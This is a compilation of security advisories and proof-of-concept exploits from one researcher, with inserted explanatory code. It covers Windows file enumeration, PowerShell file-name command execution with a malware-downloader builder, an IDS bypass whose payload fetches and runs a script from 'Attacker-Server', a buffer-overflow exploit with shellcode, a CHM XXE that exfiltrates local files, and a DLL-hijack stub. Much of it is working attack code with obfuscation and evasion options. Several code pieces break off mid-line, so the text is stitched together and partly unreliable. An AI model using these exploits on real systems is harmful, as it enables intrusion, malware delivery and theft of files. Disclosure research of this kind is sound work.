The Windows commands DIR and TYPE, by contrast, always greet attackers with the expected "Access is denied" message, whether the file exists or not. This helps protect users from having their local files known to attackers, since those commands return the same message regardless of whether the file exists, and their output is not affected by the file having a valid extension or not.

However, we can bypass that protection by avoiding DIR and TYPE and instead attempting to directly open the inaccessible user's file on the command line, much like calling a program and pressing the enter key. The Win32 API function CreateFile is then called and the shell reports one of:

1) "The system cannot find the file"
2) "Access is denied"

C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact
The system cannot find the file                  <= DOES NOT EXIST

C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact
Access is denied.                                <= EXISTS

C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.con
The system cannot find the file                  <= DOES NOT EXIST

C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever
Access is denied.                                <= FALSE POSITIVE, NO EXTENSION PRESENT IN THE FILENAME

From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe or related config files on disk with user-only rights, instead of authenticating with admin rights, as a quick paranoid first pass. For example, if malware hides itself by unlinking from the EPROCESS list in memory, or uses a program like WinRAP to hide processes from Windows Task Manager, we may not discover it even with the tasklist command (the EPROCESS structure and its flink/blink pointers are how Task Manager enumerates running processes). However, we may still detect it by testing for the correct IOC name if the malicious code resides on disk and not only in memory. What is nice is that we can do this without admin rights.

Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icacls, and cd. However, the rename, ren, cacls, type, dir, erase, move and del commands issue a flat "Access is denied".

Previously, MSRC recommended using ABE (Access-based Enumeration). However, that feature only applies to viewing files and folders in a shared folder, not to files or folders in the local file system.

Tested successfully Win7/10

[Exploit/POC]
"NtFileSins.py"

from subprocess import Popen, PIPE
import sys,argparse,re

# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# whether a file exists or not, when restricted access is attempted by another user.
#
# However, by accessing files directly, i.e. attempting to "open" them from the cmd.exe shell,
# we can
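The following is an added example, not NtFileSins.py and not part of the advisories above: a Python 3 classifier for the three cmd.exe responses the oracle relies on, plus the Zone.Identifier:$DATA probe that NtFileSins v2 added. The SAMPLES responses are constructed to match the advisory's wording, the paths in them are fictional, and the Verdict names are mine. probe() only works on Windows and must only be pointed at paths the current account cannot open: if cmd.exe can open the target it will execute it, which is exactly the "no message" case the advisory describes.

```python
import subprocess
import sys
from enum import Enum


class Verdict(Enum):
    EXISTS = "exists"              # "Access is denied."  -> the name resolved, the ACL blocked the open
    NOT_FOUND = "not found"        # "The system cannot find the file ..."
    SAME_PRIV = "same privilege"   # silence, or "is not recognized as an internal or external command":
                                   # cmd.exe could open/run it, so there is no ACL boundary to probe
    UNKNOWN = "unknown"


def classify(cmd_output: str) -> Verdict:
    """Map cmd.exe's reaction to 'opening' another user's path to the advisory's three cases."""
    text = cmd_output.strip().lower()
    if "access is denied" in text:
        return Verdict.EXISTS
    if "cannot find the file" in text:
        return Verdict.NOT_FOUND
    if not text or "is not recognized as an internal or external command" in text:
        return Verdict.SAME_PRIV
    return Verdict.UNKNOWN


def usable_name(path: str) -> bool:
    """Advisory requirement 2: without a '.' in the final component cmd.exe answers
    'Access is denied' whether or not the file exists, so such names are false positives."""
    return "." in path.replace("/", "\\").rsplit("\\", 1)[-1]


def probe(path: str, timeout: float = 5.0) -> Verdict:
    """Windows only. 'cmd.exe /c <path>' makes cmd call CreateFile on the path, and the
    advisory's oracle is the error text that comes back. Only point this at paths under
    another user's profile: if your own account can open the file, cmd.exe will RUN it."""
    if sys.platform != "win32":
        raise OSError("the cmd.exe error-message oracle only exists on Windows")
    if not usable_name(path):
        return Verdict.UNKNOWN
    proc = subprocess.run(["cmd.exe", "/c", path], capture_output=True, text=True, timeout=timeout)
    return classify(proc.stdout + proc.stderr)


def was_downloaded(path: str) -> Verdict:
    """NtFileSins v2's addition: probe the Zone.Identifier alternate data stream with the same
    oracle. EXISTS means the file carries a Mark of the Web, i.e. it was saved from the internet."""
    return probe(path + ":Zone.Identifier:$DATA")


# Constructed cmd.exe responses (wording taken from the advisory) so the classifier can be
# exercised on any OS without touching a real profile directory.
SAMPLES = {
    r"c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact":
        "Access is denied.",
    r"c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact":
        "The system cannot find the file c:\\Users\\privileged-victim\\Contacts\\Hubert Dingleberry.contact.",
    r"c:\Users\me\Desktop\notes.txt":
        "'c:\\Users\\me\\Desktop\\notes.txt' is not recognized as an internal or external command,\n"
        "operable program or batch file.",
}


def demo() -> dict:
    """Classify every constructed sample; returns {path: Verdict}."""
    return {path: classify(out) for path, out in SAMPLES.items()}


if __name__ == "__main__":
    for path, verdict in demo().items():
        print(f"{verdict.value:15} {path}")
```

The SAME_PRIV case is the one to watch in practice: it means the probe ran as a user who can open the target, so the tool has just executed whatever it was asked to "check".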
[FD] GGPowerShell / Windows PowerShell Unsanitized RCE File Tool
Tool for creating Windows .PS files with the exploitable semicolon condition. Has some options like a reverse-string PS command payload and the IP address as an integer value, etc.

http://hyp3rlinx.altervista.org/advisories/GGPowerShell.txt

from base64 import b64encode
from base64 import b64decode
from socket import *
import argparse,sys,socket,struct,re

#GGPowerShell
#Microsoft Windows PowerShell - Unsanitized Filename RCE Dirty File Creat0r.
#
#Original advisory:
#http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
#
#Original PoC:
#https://www.youtube.com/watch?v=AH33RW9g8J4
#
#By John Page (aka hyp3rlinx)
#Apparition Security
#=
#Features added to the original advisory script:
#
#Original script may have issues with -O for saving files with certain PS versions, so now uses -OutFile.
#
#Added: server port option (Base64 mode only)
#
#Added: -z Reverse String Command as an alternative to the default Base64 encoding obfuscation.
#Example self-reversing payload to save and execute a file "n.js" from 127.0.0.1 port 80 is only 66 bytes.
#
#$a='sj.n trats;sj.n eliFtuO- 1.0.0.721 rwi'[-1..-38]-join'';iex $a
#
#-z payload requires a forced malware download on the server side, defaults to port 80 and expects an ip-address.
#
#Added: IP to Integer for extra evasion - e.g 127.0.0.1 = 2130706433
#
#Added: Prefix whitespace - attempt to hide the filename payload by pushing it to the end of the filename.
#
#Since we have a space limit, malware names should try to be 5 chars max e.g. 'a.exe' including the ext, to make room for
#IP/Host/Port and whitespace, especially when Base64 encoding; for the reverse command string option we have more room to play.
#e.g. a.exe or n.js (1 char for the name plus 2 to 3 chars for the ext plus the dot).
#
#All in the name of the dirty PS filename.
#=

BANNER='''
 _ __ _ ____ / / / __ \ _ _ _/ ___// /_ |__ // / / / / / __/ / __/ /_/ / __ \ | /| / / _ \/ ___/\__ \/ __ \ /_
'''

-i flag, force-download or omit whitespace."

def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-s", "--server", help="Server to download malware from.")
    parser.add_argument("-p", "--port", help="Malware server port, defaults 80.")
    parser.add_argument("-m", "--locf", help="Name for the Malware upon download.")
    parser.add_argument("-r", "--remf", nargs="?", help="Malware to download from the remote server.")
    parser.add_argument("-f", "--force_download", nargs="?", const="1", help="No malware name specified, malware is force downloaded from the server web-root, malware type must be known up front.")
    parser.add_argument("-z", "--rev_str_cmd", nargs="?", const="1", help="Reverse string command obfuscation, Base64 alternative, ip-address and port 80 only, Malware must be force downloaded on the server-side, see -e.")
    parser.add_argument("-w", "--wspace", help="Amount of whitespace to use for added obfuscation, Base64 is set for 2 bytes.")
    parser.add_argument("-i", "--ipevade", nargs="?", const="1", help="Use the integer value of the malware servers IP address for obfuscation/evasion.")
    parser.add_argument("-e", "--example", nargs="?", const="1", help="Show example use cases")
    return parser.parse_args()

#self reversing PS command: the command is stored backwards in the filename and
#PowerShell re-reverses it at run time with [-1..-N] before iex executes it
def rev_str_command(args):
    malware=args.locf[::-1]
    revload=malware
    revload+=" trats;"
    revload+=malware
    revload+=" eliFtuO- "
    revload+=args.server[::-1]
    revload+=" rwi"
    payload = "$a='"+revload+"'[-1..-"+str(len(revload))+"]-join '';iex $a"
    return payload

def ip2int(addr):
    return struct.unpack("!I", inet_aton(addr))[0]

def ip2hex(ip):
    x = ip.split('.')
    return '0x{:02X}{:02X}{:02X}{:02X}'.format(*map(int, x))

#inet_aton accepts the 0xAABBCCDD hex form, so the hex round trip yields the same integer as ip2int(target)
def obfuscate_ip(target):
    IPHex = ip2hex(target)
    return str(ip2int(IPHex))

def decodeB64(p):
    return b64decode(p)

def validIP(host):
    try:
        socket.inet_aton(host)
        return True
    except socket.error:
        return False

def filename_sz(space,cmds,mode):
    if mode==0:
        return len(FILENAME_PREFIX)+len(space)+ 1 +len(POWERSHELL_OBFUSCATED)+ 4 + len(cmds)+ len(";.ps1")
    else:
        return len(FIL
[FD] Microsoft Windows PowerShell / Unsanitized Filename Command Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: Apparition Security

[Vendor]
www.microsoft.com

[Product]
Windows PowerShell

Windows PowerShell is a Windows command-line shell designed especially for system administrators. PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination.

[Vulnerability Type]
Unsanitized Filename Command Execution

[CVE Reference]
N/A

[Security Issue]
PowerShell can potentially execute arbitrary code when running specially named scripts, because it trusts unsanitized file names. This occurs when a ".ps1" file name contains semicolons ";" or spaces, causing either the execution of a different trojan file, or the running of unexpected commands straight from the file name itself without the need for a second file.

The trojan file does not need to be another PowerShell script; it can be any of ".com, .exe, .bat, .cpl, .js, .vbs and .wsf". Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe" if that script is invoked from the standard Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the script.

However, when such scripts are run from PowerShell's own shell rather than "cmd.exe", the "&" (call operator) blocks the exploit. Still, if the user has set ".ps1" scripts to open with PowerShell as their default program, all it takes is a double click on the file to trigger the exploit, and the "&" call operator will no longer save you. Also, if the user has not set PowerShell as the default handler for .ps1 scripts, running the script from cmd.exe like:

c:\>powershell "\Hello;World.ps1"

will also work, without dropping into the PowerShell shell.

My PoC downloads a remote executable, saves it to the victim's machine and then executes it; the .ps1 file's contents are irrelevant. Note that I use "%CD%" to target the current working directory where the victim opened the script; after "iwr" (Invoke-WebRequest, abbreviated to save space) is called it sleeps for 2 seconds and finally executes the download.

C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

This can undermine the integrity of PowerShell as it potentially allows unexpected code execution even when the script's contents have been visually reviewed. We may also be able to bypass some endpoint protection or IDS systems that look at the contents or header of a file but not at its file name, where our commands are stored. For this to work the user must have set PowerShell as the default program for opening ".ps1" files.

First, we create a Base64 encoded file name for obfuscation that will download and execute a remote executable, named in this case "n.exe":

C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

Give the PS script a normal beginning name, then separate commands using the ";" semicolon, e.g.

Test;powershell -e <Base64 string from above>;2.ps1

Create the executable without a file extension to save space in the file name, then save it back under its name using the -O parameter. The "-e" is the abbreviation of -EncodedCommand, again to save file name space. Host the executable on a web server, or just use python -m SimpleHTTPServer 80 or whatever. Double click to open in PowerShell and watch the file get downloaded, saved and executed!

My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.

Note: User interaction is required, and obviously running any random PS script is dangerous... but hey, we looked at the file content and it simply printed a string!

[Exploit / PoC]

from base64 import b64encode
import argparse,sys

#Windows PowerShell - Unsanitized Filename Command Execution Vulnerability PoC
#Create ".ps1" files with embedded commands to download, save and execute malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of the web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#

def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
    parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
    parser.add_argument("-r", "--remote_malware_name"
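The following is an added example and is neither GGPowerShell.py nor the PoC above: a Python 3 reimplementation of the three file-name encodings the two PowerShell posts describe (the UTF-16LE Base64 form that -EncodedCommand expects, GGPowerShell's reversed-string form, and the integer IP form), together with the NTFS checks that decide whether the resulting name is even creatable. The names, IPs and the 255-character limit are mine; the "calc" command used in the self-test is constructed.

```python
import base64
import socket
import struct

NTFS_NAME_LIMIT = 255                  # characters per path component
FORBIDDEN = set('\\/:*?"<>|')          # never allowed in an NTFS file name


def encoded_command(ps: str) -> str:
    """What [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(ps)) produces:
    UTF-16LE, then Base64, which is the form powershell -e / -EncodedCommand accepts."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str) -> str:
    """Inverse of encoded_command, i.e. what powershell -e actually runs."""
    return base64.b64decode(b64).decode("utf-16-le")


def reversed_payload(local_name: str, server: str) -> str:
    """GGPowerShell's -z form: the command is stored backwards and PowerShell reverses it again
    at run time with [-1..-N] -join '' before iex runs it. No Base64, so no '/' or '=' can
    sneak into the file name."""
    cmd = f"iwr {server} -OutFile {local_name};start {local_name}"
    rev = cmd[::-1]
    return f"$a='{rev}'[-1..-{len(rev)}]-join'';iex $a"


def what_iex_runs(payload: str) -> str:
    """Undo the -z trick the way PowerShell does: walk the quoted string from its
    last character (index -1) back to index -N and join the characters."""
    rev = payload.split("'")[1]
    n = int(payload.split("[-1..-")[1].split("]")[0])
    return "".join(rev[-i] for i in range(1, n + 1))


def ip_to_int(ip: str) -> int:
    """127.0.0.1 -> 2130706433: Windows resolvers accept a bare integer as an IPv4 address."""
    return struct.unpack("!I", socket.inet_aton(ip))[0]


def script_name(prefix: str, command: str, trailer: str = "2", pad: int = 0) -> str:
    """Assemble '<prefix>;<command>;<trailer>.ps1'. PowerShell treats ';' as a statement
    separator, so when the name reaches powershell.exe as a command line it runs prefix,
    then command, then trailer. pad leading spaces push the payload toward the end of the
    name (GGPowerShell's -w option)."""
    name = f"{prefix};{' ' * pad}{command};{trailer}.ps1"
    bad = FORBIDDEN & set(name)
    if bad:
        # Base64 output can contain '/', and raw commands usually contain ':' or '\'.
        # That is why the advisory Base64-encodes the command: adjust the command text
        # (a trailing space changes the encoding) until the name is clean.
        raise ValueError(f"illegal file name characters: {sorted(bad)}")
    if len(name) > NTFS_NAME_LIMIT:
        raise ValueError(f"name is {len(name)} chars, NTFS allows {NTFS_NAME_LIMIT}")
    return name


def statements(name: str) -> list:
    """The statements PowerShell sees when the file name is parsed as a command line."""
    return name.split(";")


if __name__ == "__main__":
    # constructed command mirroring the advisory; the Base64 may contain '/', hence the try
    ps = "powershell iwr 192.168.1.10/n -OutFile n.exe;sleep -s 2;start n.exe"
    try:
        print(script_name("Test", f"powershell -e {encoded_command(ps)}"))
    except ValueError as err:
        print("name rejected:", err)
    print(reversed_payload("n.js", "127.0.0.1"))
    print(ip_to_int("127.0.0.1"))
```

Running reversed_payload("n.js", "127.0.0.1") reproduces the 66-byte payload quoted in the GGPowerShell header, and what_iex_runs() shows the command that iex ultimately receives, which is the string a content-inspecting control would have to reconstruct to see anything.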
[FD] Trend Micro Deep Discovery Inspector IDS / Percent Encoding IDS Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt
[+] ISR: Apparition Security

[Vendor]
www.trendmicro.com

[Product]
Deep Discovery Inspector

Deep Discovery Inspector is a network appliance that monitors all ports and over 105 different network protocols to discover advanced threats and targeted attacks moving in and out of the network and laterally across it. The appliance detects and analyzes malware, command-and-control (C&C) communications, and evasive attacker activities that are invisible to standard security defenses.

[Vulnerability Type]
Percent Encoding IDS Bypass

[CVE Reference]
Vendor decided not to release a CVE

[Security Issue]
Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for malicious system commands like "Wget Commandline Injection", and they are flagged as high. Attacker payloads sent as plain ASCII, for example "wget", or even hex encoded as "\x77\x67\x65\x74", still get flagged and alerted on. However, attackers can easily bypass these alerts by sending the malicious command as hex preceded by percent signs "%", e.g. "%77%67%65%74", which also decodes to "wget" but is not flagged or alerted on, and may still be processed by the target system.

e.g. DDI RULE 2452
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452

Therefore, Trend Micro IDS alerts can be easily bypassed, and the payload is still run by the vulnerable target, if the payload is percent/hex encoded like %77%67%65%74. That not only bypasses the IDS, with no alert triggered or notification sent, but the application still processes the malicious command.

Importantly, the "wget" DDI Rule 2452 is just an example; this can potentially apply to any malicious request where the IDS checks the character encodings but fails to account for percent encoded hex character payload values.

[Exploit/POC]

from socket import *

#Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC
#Discovery: hyp3rlinx - ApparitionSec
#Apparition Security
#Firewall Rule Bypass

IP = raw_input("[+] Trend Micro IDS")
PORT = 80

#"wget" is sent as %77%67%65%74; spaces in the injected command are %20
payload="/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&vars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a"

req = "GET "+payload+" HTTP/1.1\r\nHost: "+IP+"\r\nConnection: close\r\n\r\n"

s=socket(AF_INET, SOCK_STREAM)
s.connect((IP, PORT))
s.send(req)

while True:
    res = s.recv(512)
    if not res:          #peer closed the connection
        break
    print res

s.close()

#Result is 200 HTTP OK and code execution on the vuln app, and no IDS alert gets triggered.

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: May 14, 2019
Vendor confirmed the IDS Bypass: May 20, 2019
Vendor informed that a DDI IDS enhancement has been made: July 18, 2019
July 23, 2019 : Public Disclosure
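The following is an added example, not Trend Micro's rule and not part of the advisory: a Python 3 sketch of the detection-side fix the bypass calls for. A signature that is matched against raw wire bytes misses "%77%67%65%74"; the same signature matched against a normalized copy of the request catches it, including double-encoded variants, because decoding is repeated to a bounded fixed point. The rule is my approximation of a "wget command line injection" check, not DDI rule 2452 itself, and the request lines in REQUESTS are constructed around the advisory's payload.

```python
import re

PCT = re.compile(r"%([0-9A-Fa-f]{2})")       # %77 -> 'w'
BSX = re.compile(r"\\x([0-9A-Fa-f]{2})")     # \x77 -> 'w'


def normalize(data: str, max_rounds: int = 3) -> str:
    """Decode %XX and \\xXX sequences repeatedly (bounded, so double encoding is handled and
    hostile input cannot make the decoder spin) so the signature is matched against what the
    target application will actually hand to system()."""
    for _ in range(max_rounds):
        decoded = PCT.sub(lambda m: chr(int(m.group(1), 16)), data)
        decoded = BSX.sub(lambda m: chr(int(m.group(1), 16)), decoded)
        if decoded == data:
            break
        data = decoded
    return data


# 'wget' as its own token followed by a separator (space, %20 or '+'), the shape of an
# injected download command rather than the word appearing inside another token.
WGET_INJECTION = re.compile(r"(?<![A-Za-z0-9_])wget(?:\s|%20|\+)", re.IGNORECASE)


def wget_alert(request_line: str, normalize_first: bool) -> bool:
    """True when the rule fires. normalize_first=False is the behaviour the advisory describes
    (the raw bytes never contain 'wget'); normalize_first=True is the fix."""
    hay = normalize(request_line) if normalize_first else request_line
    return WGET_INJECTION.search(hay) is not None


# Constructed request lines: the advisory's percent-encoded payload, a \x-encoded variant,
# the plain form, a double-encoded form and a benign request.
REQUESTS = {
    "percent": "GET /index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&vars[0]=system"
               "&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a HTTP/1.1",
    "backslash": "GET /index.php?vars[0]=system&vars[1][]=\\x77\\x67\\x65\\x74%20http://Attacker-Server/x.sh HTTP/1.1",
    "plain": "GET /index.php?vars[0]=system&vars[1][]=wget%20http://Attacker-Server/x.sh%20-O%20/tmp/a HTTP/1.1",
    "double": "GET /index.php?vars[0]=system&vars[1][]=%2577%2567%2565%2574%2520http://Attacker-Server/x.sh HTTP/1.1",
    "benign": "GET /docs/budget.html HTTP/1.1",
}


def audit(requests: dict = REQUESTS) -> dict:
    """For each request: (fires on raw bytes, fires after normalization)."""
    return {label: (wget_alert(line, False), wget_alert(line, True)) for label, line in requests.items()}


if __name__ == "__main__":
    for label, (raw, norm) in audit().items():
        print(f"{label:10} raw={raw!s:5} normalized={norm!s:5}  ->  {normalize(REQUESTS[label])[:70]}")
```

The bounded loop matters: a single decode pass turns "%2577" into "%77" and stops there, which is exactly the gap a double-encoded payload is built to exploit.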
[FD] CVE-2019-13577 / MAPLE Computer WBT SNMP Administrator v2.0.195.15 / Unauthenticated Remote Buffer Overflow Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt
[+] ISR: Apparition Security

[Vendor]
www.computerlab.com

[Product]
MAPLE Computer WBT SNMP Administrator (Thin Client Administrator) v2.0.195.15

https://www.computerlab.com/index.php/downloads/category/27-device-manager
ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE

SnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4

The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients. This software is built on the TCP/IP industry standard SNMP (Simple Network Management Protocol). Agents are built into the clients for remote management and configuration.

[Vulnerability Type]
Unauthenticated Remote Buffer Overflow Code Execution 0day

[CVE Reference]
CVE-2019-13577

[Security Issue]
SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an unauthenticated remote buffer overflow via a long string sent to the CE Remote feature listening on port 987. This overwrites data on the stack and in registers and allows control of the program's execution flow, resulting in attacker-supplied remote code execution. Authentication is not required for this exploit.

The program appears to be packed with ASPack v2.12 and can be difficult to unpack because it uses self-modifying code. When installing the vulnerable program, if it asks for a serial number just enter a value of "1" or similar. If any errors occur on launch, try right-clicking SnmpAdm.exe and running it as Administrator. Interestingly, it drops DLLs with .tmp extensions in the AppData\Local\Temp directory; make OS system files viewable in Explorer to see them, e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp

ASLR / SEH are all set to False, helping to make the exploit more portable.

CALL EBX 10008FB3

0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll)

Stack dump:

EAX 41414141
ECX 0018FEFC
EDX 0018FF10
EBX 022DDA78 ASCII "AAA
ESP 0018FECC
EBP 0018FEF4
ESI 0018FF10
EDI 0018FEFC
EIP 41414141
C 0  ES 002B 32bit 0()
P 1  CS 0023 32bit 0()
A 0  SS 002B 32bit 0()
Z 0  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0()
D 0
O 0  LastErr ERROR_NO_SCROLLBARS (05A7)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)

[Exploit/POC]

from socket import *
import struct,sys,argparse

#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
#CVE-2019-13577
#Remote Buffer Overflow 0day
#hyp3rlinx - ApparitionSec

#Pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

eip = struct.pack("<L", 0x10008FB3)    #CALL EBX in ipwSNMPv5.dll, see the stack dump above

 1:
    print "[*] No args supplied see Help -h"
    exit()

main(parse_args())

[POC Video URL]
https://www.youtube.com/watch?v=THMqueCIrFw

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: July 10, 2019
Second vendor notification attempt: July 13, 2019
No vendor replies.
July 17, 2019 : Public Disclosure
Re: [FD] Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity
[** CORRECTION Fixed Port Typo]

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Compiled HTML Help "hh.exe"

Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation. CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.

[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection

[CVE Reference]
N/A

[Security Issue]
CHM files are usually created using Microsoft's "HTML Help Workshop" program. However, I found a way to bypass that program and create them easily by simply giving the file a double .chm extension, ".chm.chm". Compiled HTML Help "hh.exe" will then accept and open it, processing any JS/HTML/XML inside. Compiled HTML Help is also vulnerable to XML External Entity attacks, allowing remote attackers to steal and exfiltrate local system files.

What is interesting about this one is that we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without having to use the "hhctrl.ocx" ActiveX control (CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436) or other code execution methods. CHM is already considered a "dangerous" file type and other types of attack against it have already been documented; I thought this was an interesting way to create "uncompiled" CHM files, bypassing the default creation steps while stealing local files in the process.

Note: User interaction is required to exploit this vulnerability.

[Exploit/POC]

1) python -m SimpleHTTPServer

2) "XXE.chm.chm" Uncompiled CHM File XXE PoC

http://localhost:81/payload.dtd";> %dtd;]> &send;

3) "payload.dtd" (hosted in the python web-server dir, port 81 above)

http://localhost:81?%file;'>"> %all;

Open the "XXE.chm.chm" file and it will exfil the Windows "system.ini"; the attacker server IP is set to localhost using port 81 for the PoC.

Tested successfully Windows 7/10

[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure

On Tue, Jul 16, 2019 at 12:10 AM hyp3rlinx wrote:
[FD] Microsoft File Checksum Integrity Verifier "fciv.exe" v2.05 / DLL Hijack Arbitrary Code Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-FILE-CHECKSUM-VERIFIER-v2.05-DLL-HIJACKING-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: Apparition Security

[Vendor]
www.microsoft.com

[Product]
File Checksum Integrity Verifier version 2.05 "fciv.exe"
Download: https://www.microsoft.com/en-us/download/details.aspx?id=11533

Excerpt from the FCIV "ReadMe.txt" file:

"Fciv is a command line utility that computes and verifies hashes of files. It computes a MD5 or SHA1 cryptographic hash of the content of the file. If the file is modified, the hash is different. With fciv, you can compute hashes of all your sensitive files. When you suspect that your system has been compromised, you can run a verification to determine which files have been modified. You can also schedule verifications regularly."

[Vulnerability Type]
DLL Hijacking Arbitrary Code Execution

[CVE Reference]
N/A

[Security Issue]
File Checksum Integrity Verifier "fciv.exe" will load and execute arbitrary DLLs named "CRYPTSP.dll" or "USERENV.dll" when verifying a file hash, if one of those DLLs exists in the same directory (CWD) from which FCIV is run. During testing I observed that on a Windows 10 system both "CRYPTSP.dll" and "USERENV.dll" will execute no problem. However, only "CRYPTSP.dll" seems to work on the Windows 7 machine I tested.

Therefore, if malware is named "CRYPTSP.dll" or "USERENV.dll" and you try to verify its hash, it will instead get executed. Upon successful exploitation the user will get the following error:

//
// File Checksum Integrity Verifier version 2.05.
//
Error during CryptAcquireContext.
Error msg : The specified procedure could not be found.
Error code : 7f

Again, to exploit this the victim must run FCIV from an infected directory where the compromised DLL lives:

c:\>fciv.exe "CRYPTSP.dll"

OR from a network share where an attacker has write privileges:

net use z: \\x.x.x.x\c$ /user:victim
z:\Users\victim\Desktop>fciv.exe c:\Windows

This was tested successfully on Windows 7/10.

[Exploit/POC]

Create a DLL named "cryptsp.dll" and download it to your default Downloads directory or wherever.

"evil.c"

//gcc -shared -o cryptsp.dll evil.c
#include <windows.h>

void evilo(void){
    WinExec("calc", 0);
}

// DllMain runs as soon as fciv.exe loads the DLL from its working directory.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
    evilo();
    return 0;
}

Start fciv.exe from the same dir where cryptsp.dll resides to verify the hash of the DLL.

C:\Users\victim\Downloads>fciv.exe cryptsp.dll

